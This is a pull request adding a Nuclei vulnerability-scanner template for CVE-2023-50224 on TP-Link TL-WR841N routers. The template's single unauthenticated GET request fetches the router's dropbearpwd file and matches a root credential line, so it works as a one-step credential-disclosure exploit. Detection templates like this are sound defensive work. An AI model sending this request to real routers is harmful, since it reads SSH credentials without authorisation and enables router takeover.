### PR TITLE
Add CVE-2023-50224 TP-Link TL-WR841N information disclosure template

### DIFF
--- a/http/cves/2023/CVE-2023-50224.yaml
+++ b/http/cves/2023/CVE-2023-50224.yaml
@@ -1,0 +1,42 @@
+id: CVE-2023-50224
+
+info:
+  name: TP-Link TL-WR841N - Information Disclosure
+  author: burnt-brownies
+  severity: medium
+  description: |
+    TP-Link TL-WR841N routers vulnerable to information disclosure via improper authentication in the httpd service on port 80. A network-adjacent attacker can read the dropbearpwd file containing SSH credentials without any authentication.
+  impact: |
+    A network-adjacent attacker can read the dropbearpwd file containing SSH credentials without any authentication, leading to full router compromise.
+  remediation: Update router firmware to the latest version available from TP-Link's official support page.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-50224 
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-50224
+    - https://www.zerodayinitiative.com/advisories/ZDI-23-1808/
+    - https://www.tp-link.com/en/support/download/tl-wr841n/v12/#Firmware
+  classification:
+    cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2023-50224
+    cwe-id: CWE-290
+  metadata: 
+    verified: false
+    max-request: 1
+    vendor: tp-link
+    product: tl-wr841n
+  tags: cve,cve2023,tp-link,router,disclosure,iot
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tmp/dropbear/dropbearpwd"
+    matchers-condition: and
+    matchers: 
+      - type: status
+        status:
+          - 200
+      
+      - type: regex 
+        regex: 
+          - "root:.*:0:0"
+        part: body


### PR DESCRIPTION
### PR Information
- Added CVE-2023-50224 TP-Link TL-WR841N Information Disclosure Template
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2023-50224
  - https://www.zerodayinitiative.com/advisories/ZDI-23-1808/
  - https://www.tp-link.com/en/support/download/tl-wr841n/v12/#Firmware
  - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-50224

### Template validation
- [ ] Validated with a host running a vulnerable version and/or 
configuration (True Positive)
- [ ] Validated with a host running a patched version and/or 
configuration (avoid False Positive)

#### Additional Details
- Template syntax validated using: nuclei -validate (no errors)
- Researched device fingerprints via Shodan (2,689 exposed devices found)
- Device identity confirmed via WWW-Authenticate header:
  "TP-LINK Wireless N Router WR841N"
- verified: false as no physical device was available for testing
- CVE is actively exploited and listed in CISA KEV catalog

### Additional References:
- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)